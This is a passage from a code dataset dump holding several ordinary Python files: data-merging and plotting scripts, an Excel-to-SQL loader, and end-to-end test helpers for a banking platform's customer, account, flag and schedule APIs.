}\n joystick_pub.send(msg)\n\n try:\n msg = joystick_subcriber.get()\n except timeout:\n pass\n\n time.sleep(1 / MESSAGE_RATE)\n","sub_path":"joystick.py","file_name":"joystick.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"460858131","text":"import json\nfrom pandas.io.json import json_normalize\nimport pandas as pd\n\ndf_1 = pd.read_csv(\"testinput/flights_new_till_03dec.csv\", low_memory=False)\nprint(df_1.shape)\n\ndf_2 = pd.read_csv(\"testinput/flights_03dec_08_dec.csv\", low_memory=False)\nprint(df_2.shape)\n\ndf_3 = pd.read_csv(\"testinput/flights_failed.csv\", low_memory=False)\nprint(df_3.shape)\n\ncombined_df = pd.concat([df_1, df_2,df_3])\nprint(combined_df.shape)\n\ncombined_df.to_csv('testinput/all_test_with_failures.csv', encoding='utf-8', index=False)","sub_path":"Abhishek_arm_test/src/load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"183870620","text":"'''\r\nvalidation_curve曲线绘制\r\n参考网址:\r\n“https://blog.csdn.net/haha456487/article/details/103987011”\r\n“https://blog.csdn.net/aliceyangxi1987/article/details/73621144”\r\n(使用SVM模型)\r\n\r\n'''\r\nfrom sklearn import datasets\r\nfrom sklearn import svm\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.model_selection import train_test_split,validation_curve\r\n\r\n#引入鸢尾花数据\r\niris = datasets.load_iris()\r\nX = iris.data#特征数据\r\ny = iris.target#分类结果\r\nx_train, x_test, y_train, y_test = train_test_split(X, y, test_size=0.3,random_state=0)\r\n\r\nclf = svm.SVC()\r\nparam_range = np.logspace(-6, -1, 5)\r\ntrain_scores, valid_scores = validation_curve( estimator=clf, X=x_train, y=y_train, param_name=\"gamma\", param_range=param_range, cv=10)\r\n\r\ntrain_mean = np.mean(train_scores, axis=1)\r\ntrain_std = np.std(train_scores, axis=1)\r\nvalid_mean = np.mean(valid_scores, axis=1)\r\nvalid_std = np.std(valid_scores, axis=1)\r\n\r\n\r\n# 可视化输出\r\n\r\nplt.plot(param_range, train_mean,label='training scores') \r\nplt.plot(param_range, valid_mean,label='validation scores') \r\nplt.legend()\r\n\r\nplt.show()","sub_path":"320180941370-liujunjiao/validation_curve.py","file_name":"validation_curve.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"350653160","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 04 15:30:05 2014\n\n@author: ValovEA\n\"\"\"\nimport xlrd, os\nimport datetime\nimport pyodbc\nfrom Tkinter import Tk\nfrom tkFileDialog import askopenfilename\n\nTk().withdraw() # we don't want a full GUI, so keep the root window from appearing\nfilename = askopenfilename() # show an \"Open\" dialog box and return the path to the selected file\nam_file = datetime.datetime.now().strftime(\"%B_%d_%Y\")\nam_table = u'AM_Table'\n\ndef sql_ins(data): # массив словарей на входе\n try:\n conn = pyodbc.connect('DRIVER={SQL Server};SERVER=localhost;DATABASE=AM')\n cur = conn.cursor()\n print(u'trying to create table...')\n query = u\"IF NOT (EXISTS (SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME = '{0}')) CREATE TABLE {0} (id INT IDENTITY(1,1), fn NVARCHAR (30), tt INT, code NVARCHAR(8), in_am INT)\".format(am_table) \n print(query)\n cur.execute(query) \n print(u'appending...')\n rows = []\n for d in data:\n fn = d.get('fn')\n tt = d.get('tt')\n code = d.get('code')\n in_am = d.get('in_am')\n row = [fn,tt,code,in_am]\n rows.append(row)\n print('insertion')\n query = \"INSERT INTO {0} (fn,tt,code,in_am) VALUES(?,?,?,?)\".format(am_table)\n print(query)\n cur.executemany(query, rows)\n conn.commit()\n conn.close()\n except Exception as e:\n print (e)\n conn.close()\n\n \ndef set_code(l_dct):\n new_d = []\n for dct in l_dct:\n code = dct['code']\n cl = len(code)\n if cl == 2:\n cnew = '0000' + code\n elif cl == 3:\n cnew = '000' + code\n elif cl == 4:\n cnew = '00' + code\n elif cl == 5:\n cnew = '0' + code\n else:\n cnew = code\n dct['code'] = cnew\n #print(code,cnew)\n new_d.append(dct)\n return new_d\n \n \ndef cbc(rd_sheet, wt_sheet=None, rlo=0, rhi=None, #листы и диапазоны столбцов/строк\nrshift=0, clo=0, chi=None, cshift = 0, file_name=None):\n wholebunch = []\n if rhi is None: rhi = rd_sheet.nrows\n if chi is None: chi = rd_sheet.ncols\n for row_index in range(rlo, rhi): #каждая ячейка выбранного диапазона\n code = rd_sheet.cell(row_index, 0).value\n try:\n code = int(code[:7].strip())\n except Exception:\n continue\n# print(code)\n for col_index in range(clo, chi):\n tt1 = rd_sheet.cell(15, col_index).value\n tt = tt1[16:19].strip()\n am1 = rd_sheet.cell(row_index, col_index).value\n amx = am1[:2]\n if amx == u'Да':\n am = 1\n else:\n am = 0\n data = {'fn':str(file_name),'tt':int(tt),'code':str(code),'in_am':int(am)}\n wholebunch.append(data)\n return wholebunch\n \ndef main():\n try:\n print(\"processing_start\", datetime.datetime.now().strftime(\"%I:%M%p on %B %d, %Y\"))\n# Dir = 'C:/py/in'\n# ext = '.xlsx'\n# list_xls = [file for file in os.listdir(Dir) if file.endswith(ext)] # массив файлов .xlsx в директории\n# files = [Dir + '/%s' % n for n in list_xls] # Фаил & путь\n# print(files) \n# for file_, file_name in enumerate(files):\n# print(file_name ,' processing...')\n rbook = xlrd.open_workbook(filename)\n rsheet = rbook.sheet_by_index(0)\n sql_ins(set_code(cbc(rsheet, rlo = 17, clo = 4, file_name = datetime.datetime.now().strftime(\"%d_%d_%Y\"))))\n print(\"Done\", datetime.datetime.now().strftime(\"%I:%M%p on %B %d, %Y\"))\n except Exception as e:\n print (e)\n \nif __name__ == \"__main__\":\n main() \n","sub_path":"AM_Statistics.py","file_name":"AM_Statistics.py","file_ext":"py","file_size_in_byte":3932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"385663176","text":"# Copyright @ 2020 Thought Machine Group Limited. All rights reserved.\n# standard libs\nimport json\nimport logging\nimport random\nimport os\nimport uuid\nimport time\nfrom datetime import datetime, timezone\nfrom enum import Enum\nfrom typing import Any, Dict, List, Optional\n\n# common\nimport common.test_utils.endtoend as endtoend\n\n# third party\nfrom requests import HTTPError\n\nlog = logging.getLogger(__name__)\nlogging.basicConfig(\n level=os.environ.get(\"LOGLEVEL\", \"INFO\"),\n format=\"%(asctime)s.%(msecs)03d - %(levelname)s: %(message)s\",\n datefmt=\"%Y-%m-%d %H:%M:%S\",\n)\n\n\nclass AccountStatus(Enum):\n ACCOUNT_STATUS_UNKNOWN = \"ACCOUNT_STATUS_UNKNOWN\"\n ACCOUNT_STATUS_OPEN = \"ACCOUNT_STATUS_OPEN\"\n ACCOUNT_STATUS_CLOSED = \"ACCOUNT_STATUS_CLOSED\"\n ACCOUNT_STATUS_CANCELLED = \"ACCOUNT_STATUS_CANCELLED\"\n ACCOUNT_STATUS_PENDING_CLOSURE = \"ACCOUNT_STATUS_PENDING_CLOSURE\"\n ACCOUNT_STATUS_PENDING = \"ACCOUNT_STATUS_PENDING\"\n\n\nclass CalendarEventStatus(Enum):\n BOTH = \"BOTH\"\n ONLY_TRUE = \"ONLY_TRUE\"\n ONLY_FALSE = \"ONLY_FALSE\"\n\n\ndef create_customer(\n title=\"CUSTOMER_TITLE_MR\",\n first_name=\"e2eTest\",\n middle_name=\"\",\n last_name=\"Smith\",\n dob=\"1980-12-25\",\n gender=\"CUSTOMER_GENDER_MALE\",\n nationality=\"GB\",\n email_address=\"e2etesting@tm.com\",\n mobile_phone_number=\"+442079460536\",\n home_phone_number=\"+442079460536\",\n business_phone_number=\"+442079460536\",\n contact_method=\"CUSTOMER_CONTACT_METHOD_NONE\",\n country_of_residence=\"GB\",\n country_of_taxation=\"GB\",\n accessibility=\"CUSTOMER_ACCESSIBILITY_AUDIO\",\n additional_details=None,\n details=None,\n):\n\n datestr = datetime.now().strftime(\"%Y%m%d%H%M%S\")\n randid = str(random.getrandbits(58))\n cust_id = datestr + randid[len(datestr) :] # noqa: E203\n\n default_customer = {\n \"request_id\": uuid.uuid4().hex,\n \"customer\": {\n \"id\": cust_id,\n \"status\": \"CUSTOMER_STATUS_ACTIVE\",\n \"identifiers\": [\n {\"identifier_type\": \"IDENTIFIER_TYPE_USERNAME\", \"identifier\": cust_id}\n ],\n \"customer_details\": {\n \"title\": title,\n \"first_name\": first_name,\n \"middle_name\": middle_name,\n \"last_name\": last_name,\n \"dob\": dob,\n \"gender\": gender,\n \"nationality\": nationality,\n \"email_address\": email_address,\n \"mobile_phone_number\": mobile_phone_number,\n \"home_phone_number\": home_phone_number,\n \"business_phone_number\": business_phone_number,\n \"contact_method\": contact_method,\n \"country_of_residence\": country_of_residence,\n \"country_of_taxation\": country_of_taxation,\n \"accessibility\": accessibility,\n },\n \"additional_details\": additional_details,\n },\n }\n\n customer_details = json.dumps(details if details else default_customer)\n customer = endtoend.helper.send_request(\n \"post\", \"/v1/customers\", data=customer_details\n )\n\n log.info(\"Customer %s created\", customer[\"id\"])\n endtoend.testhandle.customers.append(customer[\"id\"])\n return customer[\"id\"]\n\n\ndef get_customer(customer_id):\n resp = endtoend.helper.send_request(\"get\", \"/v1/customers/\" + customer_id)\n return resp\n\n\ndef get_existing_test_customer():\n if endtoend.testhandle.customers:\n return endtoend.testhandle.customers[0]\n else:\n return create_customer()\n\n\ndef set_customer_status(customer_id, status):\n post_body = {\n \"request_id\": uuid.uuid4().hex,\n \"customer\": {\"status\": status},\n \"update_mask\": {\"paths\": [\"status\"]},\n }\n\n resp = endtoend.helper.send_request(\n \"put\", \"/v1/customers/\" + customer_id, data=json.dumps(post_body)\n )\n log.info(\"Customer %s set to %s\", customer_id, status)\n return resp\n\n\ndef get_customer_accounts(customer_id):\n resp = endtoend.helper.send_request(\n \"get\",\n \"/v1/accounts\",\n params={\"stakeholder_id\": customer_id, \"page_size\": \"100\"},\n )\n\n return resp[\"accounts\"]\n\n\ndef get_customer_addresses(customer_id):\n body = {\"customer_id\": customer_id, \"page_size\": \"1000\", \"include_previous\": \"True\"}\n\n resp = endtoend.helper.send_request(\"get\", \"/v1/customer-addresses\", params=body)\n\n # A list of customer addresses, ordered by descending creation time.\n return resp[\"customer_addresses\"]\n\n\ndef create_payment_device(routing_info, status=\"PAYMENT_DEVICE_STATUS_ACTIVE\"):\n post_body = {\n \"payment_device\": {\"routing_info\": routing_info, \"status\": status},\n \"request_id\": uuid.uuid4().hex,\n }\n\n resp = endtoend.helper.send_request(\n \"post\", \"/v1/payment-devices\", data=json.dumps(post_body)\n )\n\n return resp\n\n\ndef create_payment_device_link(\n payment_device_id,\n account_id,\n token=None,\n status=\"PAYMENT_DEVICE_LINK_STATUS_ACTIVE\",\n):\n\n post_body = {\n \"payment_device_link\": {\n \"token\": token,\n \"payment_device_id\": payment_device_id,\n \"account_id\": account_id,\n \"status\": status,\n },\n \"request_id\": uuid.uuid4().hex,\n }\n\n resp = endtoend.helper.send_request(\n \"post\", \"/v1/payment-device-links\", data=json.dumps(post_body)\n )\n\n return resp\n\n\ndef get_payment_device_links(\n tokens=None,\n payment_device_ids=None,\n account_ids=None,\n effective_timestamp=None,\n include_inactive=None,\n):\n # Returns a list of payment device links, or an empty list if none found.\n\n resp = endtoend.helper.send_request(\n \"get\",\n \"/v1/payment-device-links\",\n params={\n \"tokens\": tokens,\n \"payment_device_ids\": payment_device_ids,\n \"account_ids\": account_ids,\n \"effective_timestamp\": effective_timestamp,\n \"include_inactive\": include_inactive,\n },\n )\n\n return resp[\"payment_device_links\"]\n\n\ndef get_payment_device(payment_device_ids):\n # If this ID doesn't exist, Vault will throw an error\n\n resp = endtoend.helper.send_request(\n \"get\", \"/v1/payment-devices:batchGet\", params={\"ids\": payment_device_ids}\n )\n\n return resp[\"payment_devices\"][payment_device_ids]\n\n\ndef get_uk_acc_num_and_sort_code(account_id):\n pd_link = get_payment_device_links(account_ids=account_id)\n\n if len(pd_link) == 0:\n raise NameError(\n \"No payment device link found for \" \"account {}\".format(account_id)\n )\n\n # todo: Search through all pd_links\n pd = get_payment_device(pd_link[0][\"payment_device_id\"])\n\n if all(word in pd[\"routing_info\"] for word in [\"account_number\", \"bank_id\"]):\n return pd[\"routing_info\"][\"account_number\"], pd[\"routing_info\"][\"bank_id\"]\n else:\n raise NameError(\n \"No account number or sort code found for account \"\n \"{}. Has it been set up with UK routing info?\".format(account_id)\n )\n\n\ndef create_flag_definition(\n flag_id: str,\n name: str = \"\",\n description: str = \"\",\n required_flag_level: str = \"FLAG_LEVEL_ACCOUNT\",\n flag_visibility: str = \"FLAG_VISIBILITY_CONTRACT\",\n) -> Dict[str, str]:\n\n name = name or flag_id\n description = description or flag_id\n\n post_body = {\n \"request_id\": uuid.uuid4().hex,\n \"flag_definition\": {\n \"id\": flag_id,\n \"name\": name,\n \"description\": description,\n \"required_flag_level\": required_flag_level,\n \"flag_visibility\": flag_visibility,\n },\n }\n\n resp = endtoend.helper.send_request(\n \"post\", \"/v1/flag-definitions\", data=json.dumps(post_body)\n )\n log.info(f\"Flag created: {description}\")\n return resp\n\n\ndef list_flag_definitions(\n flag_visibility: str = \"FLAG_VISIBILITY_CONTRACT\",\n flag_levels: List[str] = None,\n include_inactive: str = \"true\",\n) -> List[Dict[str, Any]]:\n body = {\n \"flag_visibility_level\": flag_visibility,\n \"flag_levels\": flag_levels or [\"FLAG_LEVEL_ACCOUNT\", \"FLAG_LEVEL_CUSTOMER\"],\n \"include_inactive\": include_inactive,\n }\n resp = endtoend.helper.list_resources(\"flag-definitions\", params=body)\n return resp\n\n\ndef batch_get_flag_definitions(ids: List[str]) -> Dict[str, Dict[str, str]]:\n\n return endtoend.helper.send_request(\n \"get\", \"/v1/flag-definitions:batchGet\", params={\"ids\": ids}\n )[\"flag_definitions\"]\n\n\ndef create_flag(\n flag_name: str,\n account_id: str = None,\n customer_id: str = None,\n payment_device_id: str = None,\n description: str = None,\n):\n\n description = description or flag_name\n if account_id:\n target = \"account_id\"\n target_id = account_id\n elif customer_id:\n target = \"customer_id\"\n target_id = customer_id\n elif payment_device_id:\n target = \"payment_device_id\"\n target_id = payment_device_id\n else:\n raise NameError(\"No target has been specified so flag can not be applied!\")\n\n post_body = {\n \"request_id\": uuid.uuid4().hex,\n \"flag\": {\n \"flag_definition_id\": flag_name,\n \"description\": description,\n target: target_id,\n },\n }\n\n resp = endtoend.helper.send_request(\"post\", \"/v1/flags\", data=json.dumps(post_body))\n log.info(f\"Flag applied for account {account_id}: {description}\")\n return resp\n\n\ndef remove_flag(flag_id: str) -> Dict[str, str]:\n put_body = {\n \"request_id\": uuid.uuid4().hex,\n \"flag\": {\n \"is_active\": False,\n },\n \"update_mask\": {\"paths\": [\"is_active\"]},\n }\n resp = endtoend.helper.send_request(\n \"put\", f\"/v1/flags/{flag_id}\", data=json.dumps(put_body)\n )\n log.info(f'Flag {flag_id} {resp[\"description\"]} removed')\n return resp\n\n\ndef get_flag(flag_name: str, account_ids: List[str] = None) -> List[Dict[str, Any]]:\n body = {\"flag_definition_id\": flag_name, \"account_ids\": account_ids or []}\n resp = endtoend.helper.list_resources(\"flags\", params=body)\n return resp\n\n\ndef create_restriction_set_definition_version(\n restriction_id, restriction_type, restriction_level, description=None\n):\n\n description = description or restriction_id\n\n post_body = {\n \"request_id\": uuid.uuid4().hex,\n \"restriction_set_definition_version\": {\n \"restriction_set_definition_id\": restriction_id,\n \"description\": description,\n \"restriction_definitions\": [\n {\n \"restriction_type\": restriction_type,\n \"required_restriction_levels\": restriction_level,\n }\n ],\n },\n }\n\n resp = endtoend.helper.send_request(\n \"post\",\n \"/v1/restriction-set-definition/blocking_test/versions\",\n data=json.dumps(post_body),\n )\n log.info(f\"Restriction created: {description}\")\n return resp\n\n\ndef create_restriction_set(account_id, restriction_id, name=None, description=None):\n\n name = name or restriction_id\n description = description or restriction_id\n\n post_body = {\n \"request_id\": uuid.uuid4().hex,\n \"restriction_set\": {\n \"restriction_set_definition_id\": restriction_id,\n \"name\": name,\n \"description\": description,\n \"restriction_set_parameters\": {},\n \"account_id\": account_id,\n },\n }\n\n resp = endtoend.helper.send_request(\n \"post\", \"/v1/restriction-sets\", data=json.dumps(post_body)\n )\n log.info(\"Restriction applied to account %s preventing debits\", account_id)\n return resp\n\n\ndef remove_restriction_set(account_id, restriction_set_id):\n resp = update_restriction_set(restriction_set_id, \"is_active\", False)\n log.info(f\"Restriction set removed from account {account_id} preventing debits\")\n return resp\n\n\ndef update_restriction_set(restriction_set_id, update_field, update_value):\n post_body = {\n \"request_id\": uuid.uuid4().hex,\n \"restriction_set\": {\"id\": restriction_set_id, update_field: update_value},\n \"update_mask\": {\"paths\": [update_field]},\n }\n\n resp = endtoend.helper.send_request(\n \"put\", \"/v1/restriction-sets/\" + restriction_set_id, data=json.dumps(post_body)\n )\n log.info(\n f\"Restriction set {restriction_set_id} updated: {update_field} set to {update_value}\"\n )\n return resp\n\n\ndef get_account_schedule_assocs(account_id: str) -> List[Dict[str, Any]]:\n body = {\n \"account_id\": account_id,\n }\n resp = endtoend.helper.list_resources(\"account-schedule-assocs\", params=body)\n\n # A list of account to schedule associations\n return resp\n\n\ndef get_schedules(schedule_ids):\n body = {\"ids\": schedule_ids}\n\n resp = endtoend.helper.send_request(\"get\", \"/v1/schedules:batchGet\", params=body)\n\n # A dict of schedule_id to schedule objects\n return resp[\"schedules\"]\n\n\ndef get_jobs(schedule_id: str) -> List[Dict[str, Any]]:\n \"\"\"\n Gets all the jobs with the specified schedule_id\n :param schedule_id: id for filterling which jobs to retrieved.\n ...\n :return: List of schedules with the specified schedule_id else\n return empty list\n \"\"\"\n body = {\"schedule_id\": schedule_id}\n result = endtoend.helper.list_resources(\"jobs\", params=body)\n return result\n\n\ndef get_account_schedules(\n account_id: str, invalid_statuses: Optional[List[str]] = None\n):\n if invalid_statuses != []:\n invalid_statuses = invalid_statuses or [\"SCHEDULE_STATUS_DISABLED\"]\n account_schedule_assocs = get_account_schedule_assocs(account_id)\n\n if not account_schedule_assocs:\n return {}\n account_schedule_ids = [assoc[\"schedule_id\"] for assoc in account_schedule_assocs]\n\n response_account_schedules = get_schedules(account_schedule_ids)\n\n account_schedules = {}\n for _, schedule_details in response_account_schedules.items():\n # Schedule display name is of format \" for \"\n if schedule_details[\"status\"] not in invalid_statuses and schedule_details[\n \"display_name\"\n ].endswith(f\" for {account_id}\"):\n account_schedule_name = schedule_details[\"display_name\"].replace(\n f\" for {account_id}\", \"\"\n )\n account_schedules[account_schedule_name] = schedule_details\n\n # A dict of schedule event_names to their schedule objects\n return account_schedules\n\n\ndef get_account_derived_parameters(account_id: str, effective_timestamp: str = \"\"):\n body = {\"fields_to_include\": [\"INCLUDE_FIELD_DERIVED_INSTANCE_PARAM_VALS\"]}\n if effective_timestamp:\n body.update({\"instance_param_vals_effective_timestamp\": effective_timestamp})\n\n resp = endtoend.helper.send_request(\n \"get\", f\"/v1/accounts/{account_id}\", params=body\n )\n\n return resp[\"derived_instance_param_vals\"]\n\n\ndef get_balances(\n account_id: str,\n from_value_time: datetime = None,\n to_value_time: datetime = None,\n exclude_starting_balance: bool = False,\n live: bool = True,\n posting_instruction_batch_id: str = \"\",\n) -> List[Dict[str, str]]:\n \"\"\"\n Gets balances for a given account\n :param account_id: the account to retrieve\n :param from_value_time: Optional value time to retrieve from. Ignored if live=True\n :param to_value_time: Optional value time to retrieve up until. Ignored if live=True\n :param exclude_starting_balance: if True the balances before from_value_time are excluded.\n Ignored if live=True\n :param live: set to True if for live balances only, or False to also get historical balances\n :param posting_instruction_batch_id: The posting instruction batch ID that initially created\n the balance\n :return: the list of balances\n \"\"\"\n params = {\n \"account_id\": account_id,\n \"live\": live,\n \"posting_instruction_batch_id\": posting_instruction_batch_id,\n }\n if not live:\n if from_value_time:\n params.update(\n {\n \"time_range.from_value_time\": from_value_time.astimezone(\n timezone.utc\n ).isoformat()\n }\n )\n if to_value_time:\n params.update(\n {\n \"time_range.to_value_time\": to_value_time.astimezone(\n timezone.utc\n ).isoformat()\n }\n )\n if exclude_starting_balance:\n params.update(\n {\"time_range.exclude_starting_balance\": exclude_starting_balance}\n )\n\n resp = endtoend.helper.list_resources(\"balances\", params)\n\n return resp\n\n\ndef get_account_update(account_update_id: str) -> Dict[str, Any]:\n \"\"\"\n Retrieve a specific account update by its id\n :param account_update_id: id of the account update to retrieve\n :return: the account update resource\n \"\"\"\n\n resp = endtoend.helper.send_request(\n \"get\", f\"/v1/account-updates/{account_update_id}\"\n )\n\n return resp\n\n\ndef get_account_updates(\n account_id: str, statuses: List[str] = None\n) -> List[Dict[str, Any]]:\n \"\"\"\n Get a list of account updates for a given account\n :param account_id: account id for the account to get updates for\n :param statuses: statuses of account updates to filter on. Optional.\n :return: list of account updates matching the criteria\n \"\"\"\n\n params = {\"account_id\": account_id, \"statuses\": statuses}\n return endtoend.helper.list_resources(\"account-updates\", params)\n\n\ndef get_account_updates_by_type(\n account_id: str, update_types: List[str], statuses: List[str] = None\n) -> List[Dict[str, Any]]:\n \"\"\"\n Gets a list of account updates and filters by type\n :param account_id: the account id to get account updates for\n :param update_types: the list of account update types we want to filter for (not handled in API)\n :param statuses: the list of account update statuses we want to filter for (handled in API)\n :return: List of account updates\n \"\"\"\n\n account_updates = get_account_updates(account_id, statuses)\n account_updates_by_type = [\n account_update\n for account_update in account_updates\n for update_type in update_types\n if update_type in account_update\n ]\n return account_updates_by_type\n\n\ndef get_product_version(product_version_id: str, include_code: bool = False) -> Dict:\n \"\"\"\n Fetches product version from instance.\n\n :param product_version_id: Instance version id of the product, not the id found in the sc file\n :param include_code: Specifies whether raw code needs to be included in response\n \"\"\"\n view = [\"PRODUCT_VERSION_VIEW_INCLUDE_CODE\"] if include_code else []\n params = {\"ids\": product_version_id, \"view\": view}\n resp = endtoend.helper.send_request(\n \"get\", \"/v1/product-versions:batchGet\", params=params\n )\n return resp[\"product_versions\"][product_version_id]\n\n\ndef create_account_update(\n account_id: str,\n account_update: Dict[str, Dict[str, Any]],\n account_update_id: str = \"\",\n) -> Dict[str, Any]:\n \"\"\"\n\n :param account_id: account id of the account to update\n :param account_update: Dict where the key is the desired account update (i.e.\n instance_param_vals_update, product_version_update, activation_update, closure_update) and the\n value is the Dict with the required parameters for the account update type. For example:\n {\n 'instance_param_vals_update': {\n 'instance_param_vals': {\n 'KEY': 'value1'\n }\n }\n }\n :param account_update_id: optional account update id to use. Randomly generated by service if\n omitted\n :return: The resulting account update resource\n \"\"\"\n\n body = {\n \"request_id\": uuid.uuid4().hex,\n \"account_update\": {\n \"id\": account_update_id,\n \"account_id\": account_id,\n **account_update,\n },\n }\n jsonbody = json.dumps(body)\n resp = endtoend.helper.send_request(\"post\", \"/v1/account-updates\", data=jsonbody)\n log.info(f\"Account update {account_update} created\")\n return resp\n\n\ndef create_closure_update(account_id: str) -> Dict[str, Any]:\n \"\"\"\n Creates an account update to re-run the close_code hook once the account status is already\n 'ACCOUNT_STATUS_PENDING_CLOSURE'\n :param account_id: the account id of the account to update\n :return: The resulting account update resource\n \"\"\"\n account_update = {\"closure_update\": {}}\n return create_account_update(account_id, account_update)\n\n\ndef update_account_instance_parameters(\n account_id: str, instance_param_vals: Dict[str, Any]\n) -> Dict[str, Any]:\n \"\"\"\n Creates an account update to update specified instance parameters to the specified values\n :param account_id: the account id of the account to update\n :param instance_param_vals: dictionary of instance parameter names to updated values\n :return: The resulting account update resource\n \"\"\"\n account_update = {\n \"instance_param_vals_update\": {\"instance_param_vals\": instance_param_vals}\n }\n return create_account_update(account_id, account_update)\n\n\ndef update_account(account_id: str, status: AccountStatus) -> Dict[str, Any]:\n \"\"\"\n Update an account\n :param account_id: account id of the account to update\n :param status: new account status\n :return: the updated account\n \"\"\"\n body = {\n \"request_id\": str(uuid.uuid4()),\n \"account\": {\"status\": status.value},\n \"update_mask\": {\"paths\": [\"status\"]},\n }\n body = json.dumps(body)\n resp = endtoend.helper.send_request(\"put\", \"/v1/accounts/\" + account_id, data=body)\n return resp\n\n\ndef create_product_version(\n request_id: str,\n code: str,\n product_id: str,\n supported_denominations: List[str],\n tags: List[str] = None,\n params: List[Any] = None,\n is_internal: bool = False,\n migration_strategy: str = \"PRODUCT_VERSION_MIGRATION_STRATEGY_UNKNOWN\",\n contract_properties: Dict[str, Any] = None,\n) -> Dict[str, Any]:\n \"\"\"\n Creates a product version by using the core api endpoint\n :param request_id: str, unique string ID that is used to ensure the request is idempotent\n :param code: str, the smart contract code\n :param product_id: str, the ID of the product we want to create\n :param supported_denominations: List[str], the denominations supported by this product version\n :param tags: List[str], tags for the product version\n :param params: List[object], the parameter values for the product version\n :param is_internal: bool, denotes if the product being uploaded is an internal product or not\n :param migration_strategy: str, the migration strategy for applying the new version\n :param contract_properties: Dict[str, object], the contract specific property values\n :return: Dict[str, object], return value of core api call\n \"\"\"\n contract_properties = contract_properties or {}\n display_name = contract_properties.get(\"display_name\", \"\")\n if is_internal:\n migration_strategy = \"PRODUCT_VERSION_MIGRATION_STRATEGY_NEW_PRODUCT\"\n\n post_body = {\n # ProductVersions are immutable, so we can use that to simply return an already created\n # ProductVersion.\n \"request_id\": request_id,\n \"product_version\": {\n \"product_id\": product_id,\n \"code\": code,\n \"supported_denominations\": supported_denominations,\n \"params\": params,\n \"tags\": tags or [],\n \"display_name\": display_name,\n \"description\": \"\",\n \"summary\": \"\",\n },\n \"is_internal\": is_internal,\n \"migration_strategy\": migration_strategy,\n }\n\n post_body = json.dumps(post_body)\n\n resp = endtoend.helper.send_request(\"post\", \"/v1/product-versions\", data=post_body)\n\n return resp\n\n\ndef create_account_schedule_tag(\n account_schedule_tag_id: str,\n description: str = \"\",\n sends_scheduled_operation_reports: bool = True,\n schedule_status_override: str = \"ACCOUNT_SCHEDULE_TAG_SCHEDULE_STATUS_OVERRIDE_NO_OVERRIDE\",\n schedule_status_override_start_timestamp: Optional[str] = None,\n schedule_status_override_end_timestamp: Optional[str] = None,\n test_pause_at_timestamp: Optional[str] = None,\n) -> Dict[str, str]:\n\n post_body = {\n \"request_id\": str(uuid.uuid4()),\n \"account_schedule_tag\": {\n \"id\": account_schedule_tag_id,\n \"description\": description,\n \"sends_scheduled_operation_reports\": sends_scheduled_operation_reports,\n \"schedule_status_override\": schedule_status_override,\n \"schedule_status_override_start_timestamp\": schedule_status_override_start_timestamp,\n \"schedule_status_override_end_timestamp\": schedule_status_override_end_timestamp,\n \"test_pause_at_timestamp\": test_pause_at_timestamp,\n },\n }\n\n post_body = json.dumps(post_body)\n\n resp = endtoend.helper.send_request(\n \"post\", \"/v1/account-schedule-tags\", data=post_body\n )\n\n return resp\n\n\ndef list_account_schedule_tags(result_limit: int) -> List[Dict[str, str]]:\n\n return endtoend.helper.list_resources(\n \"account-schedule-tags\", result_limit=result_limit\n )\n\n\ndef batch_get_account_schedule_tags(\n account_schedule_tag_ids: List[str],\n) -> Dict[str, Dict[str, str]]:\n\n return endtoend.helper.send_request(\n \"get\",\n \"/v1/account-schedule-tags:batchGet\",\n params={\"ids\": account_schedule_tag_ids},\n )[\"account_schedule_tags\"]\n\n\ndef update_account_schedule_tag(\n account_schedule_tag_id: str,\n schedule_status_override: Optional[str] = None,\n schedule_status_override_start_timestamp: Optional[str] = None,\n schedule_status_override_end_timestamp: Optional[str] = None,\n test_pause_at_timestamp: Optional[str] = None,\n) -> Dict[str, str]:\n\n update_mask_paths = list()\n account_schedule_tag = dict()\n\n # status, start timestamp and end timestamp must all be set together\n if schedule_status_override:\n update_mask_paths.extend(\n [\n \"schedule_status_override\",\n \"schedule_status_override_start_timestamp\",\n \"schedule_status_override_end_timestamp\",\n ]\n )\n account_schedule_tag.update(\n {\n \"schedule_status_override\": schedule_status_override,\n \"schedule_status_override_start_timestamp\": (\n schedule_status_override_start_timestamp\n ),\n \"schedule_status_override_end_timestamp\": schedule_status_override_end_timestamp,\n }\n )\n\n if test_pause_at_timestamp:\n update_mask_paths.append(\"test_pause_at_timestamp\")\n account_schedule_tag[\"test_pause_at_timestamp\"] = test_pause_at_timestamp\n\n body = json.dumps(\n {\n \"request_id\": uuid.uuid4().hex,\n \"account_schedule_tag\": account_schedule_tag,\n \"update_mask\": {\"paths\": update_mask_paths},\n }\n )\n\n return endtoend.helper.send_request(\n \"put\", \"/v1/account-schedule-tags/\" + account_schedule_tag_id, data=body\n )\n\n\ndef get_calendar_events(\n calendar_ids: Optional[List[str]] = None,\n calendar_event_names: Optional[List[str]] = None,\n calendar_timestamp_from: str = \"\",\n calendar_timestamp_to: str = \"\",\n is_active: bool = True,\n active_calendar_event: Optional[CalendarEventStatus] = None,\n) -> List[Dict[str, Any]]:\n\n active_calendar_event = active_calendar_event or CalendarEventStatus.ONLY_TRUE\n\n body = {\n \"calendar_ids\": calendar_ids or [],\n \"calendar_event_names\": calendar_event_names or [],\n \"calendar_timestamp_range.from\": calendar_timestamp_from,\n \"calendar_timestamp_range.to\": calendar_timestamp_to,\n \"is_active\": str(is_active).lower(),\n \"active_calendar_event\": active_calendar_event.value,\n }\n resp = endtoend.helper.list_resources(\"calendar-event\", params=body)\n\n return resp\n\n\ndef create_calendar_event(\n event_id: str,\n calendar_id: str,\n name: str,\n is_active: bool,\n start_timestamp: datetime,\n end_timestamp: datetime,\n):\n post_body = {\n \"request_id\": uuid.uuid4().hex,\n \"calendar_event\": {\n \"id\": event_id,\n \"calendar_id\": calendar_id,\n \"name\": name,\n \"is_active\": is_active,\n 